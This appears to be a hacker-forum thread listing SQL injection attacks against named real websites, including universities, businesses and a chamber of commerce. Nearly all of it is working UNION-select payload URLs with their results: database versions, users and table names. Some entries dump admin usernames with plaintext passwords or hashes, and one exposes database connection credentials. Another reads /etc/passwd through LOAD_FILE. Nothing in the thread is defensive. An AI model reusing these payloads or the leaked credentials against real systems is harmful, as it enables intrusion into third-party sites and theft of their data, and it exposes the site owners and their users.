LLC “RostInvestLeasing”: together with the West Ural Bank of Sberbank of Russia, it invests in over 200 enterprises. Code: http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
SQLi: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9-- version: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9-- 5.0.27 tables are output using LIMIT: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables-- info: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),database()),6,7,8,9-- user() webtoad@localhost database() jfdavis_webtoad
Code: http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11 [email protected]:dma:5.0.45 P.S.: Has Achat gone rainbow style now?
http://goglobal.fiu.edu Code: http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,19,11,12/* 4.1.14-nt:goglobal:[email protected]
SQLi: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5-- version: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5-- 5.0.67 tables are output using LIMIT: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information_schema.tables-- info: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database()),4,5-- user() aroma15_aromasho@localhost database() aroma15_aromaonline
Penza Regional Center for Internet Education TIC: 325 PR: 4 Code: http://rcio.pnzgu.ru/grad.php?id=4801 Blind, since it's the third branch - there is no union... fio@localhost - User fio - DB 3.23.58 - Version
SQLi: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7,8-- version: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3,4,5,6,7,8-- 5.0.24 table list: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables-- we see the table login column list: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns-- we see the columns: user and pass dumping the info: user: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6,7,8+from+login-- pass: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6,7,8+from+login-- info: user: exhibit001 pass: ireland2 couldn't find the admin panel =((((((((
http://www.vdostudio.com Code: http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/* version() - 5.0.22 database() - vdostudio
Code: http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5-- user/db/version: Code: [email protected] : wonderwork_db1 : 5.0.51a-24-log Admin: Code: http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id,username,password),3,4,5+from+admin-- id/login/pass: Code: 1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a
nfca.org(with file_priv) pr - 6: PHP: http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user(),version(),database()),LOAD_FILE(0x2f6574632f706173737764),8--+ [email protected]:4.0.24-log:ism_data_nfca
Code: http://www.autokom.cz/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6-- user/db/version: Code: www_autokom_cz@localhost : www_autokom_cz : 5.0.45
Code: http://www.black-time.net/usr.php?act=com&id_obj=-1+union+select+1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),8,9,10,11,12,13,14 [email protected]:black-time:4.1.8-standard
http://www.ftlauderdalenews.net (PR3) Code: http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8+from+users/* 4.1.20-max-logromena_news[email protected] Code: http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,password,name),5,6,7,8+from+users/* name : Ray Brasted password : 1x2y3z
Code: http://www.cfs-nl.ca/media-read.php?id=-1+union+all+select+0,1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12-- user/db/version: Code: cfsnl_admin@localhost : cfsnl_admin_old : 5.0.45-log
cialis-cialis.com HTML: http://www.cialis-cialis.com/art.php?id=-29%20union%20select%201,2,unhex(hex(concat_ws(0x3a,version(),user(),database()))),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 4.1.10-standard:poppen_shop3@localhost:poppen_shop3 It ranks for good queries on Austrian Google =) ____________________________________________ Code: [SIZE=3][COLOR=DarkGreen]http://www.talkeetnachamber.org PR4[/COLOR][/SIZE] http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,1 [B]5.0.51a-log:talkeetn_db01:[email protected][/B] There is an interesting table with the DB connection data http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,0,1%20from%20information_schema.columns%20where%20table_name=0x7068704d795365617263685f73657474696e6773 Let's go =) http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a3a3a,DBName,DBUser,DBPassword,DBHost),5,6,7,8,9,0,1%20from%20phpMySearch_settings [I]DBName,DBUser,DBPassword,DBHost[/I] talkeetn_db01:::talkeetn_db01:::freckles:::localhost
[PR 4] Code: http://www.golf-in-japan.com/prefcourses/data.php?ID=-178+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 4.0.27-log:golfinja:[email protected] [PR 0] Code: http://www.okna-astem.ru/data.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 5.0.51a-community:db_oknaastem1knaastem1@localhost
http://www.cash.ge/doors.php?id=1'+union+select+1,2,concat_ws(0x3a,version(),da tabase(),u ser()),4/*&lang=eng 4.1.22-standard:cashge_aks:cashge_aks@localhost ------------------------------------------------------------------------ A Georgian site about something or other http://www.muskie.ge/acus.php?lan_id=1&id=-1+union+select+1,2,concat_ws(0x3a,ver sion(),databa se(),user()),4,5-- 4.0.27:muskie_ge:muskie_ge@localhost PR: 2 ------------------------------------------------------------------------ http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,version(),data base(),us er()),3,4,5-- 4.1.7-max-log:mitex:mitex@localhost
Code: http://acthra.anu.edu.au/cases/case.php?id=86 Blind - union doesn't work for some reason. V: 5.0.45-log U: [email protected] DB: regent_acthra
Code: http://www.tosport.ru/detail_1247'.html Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables-- From it we take the table cizar_admin and look at its contents: Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where/**/table_name=0x63697a61725f61646d696e-- Code: id,access,login,password,name,position,address,phone,email,description,pactive,menu_access After that, either I'm being dumb, or... in short, the output doesn't work DB data: Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Georgia again http://www.webmix.ge/g_viewweb.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),datab ase(),us er()),40-- 5.0.75-community-log:webmixin_portfolio:webmixin_portfol@localhost TIC: 20 PR: 5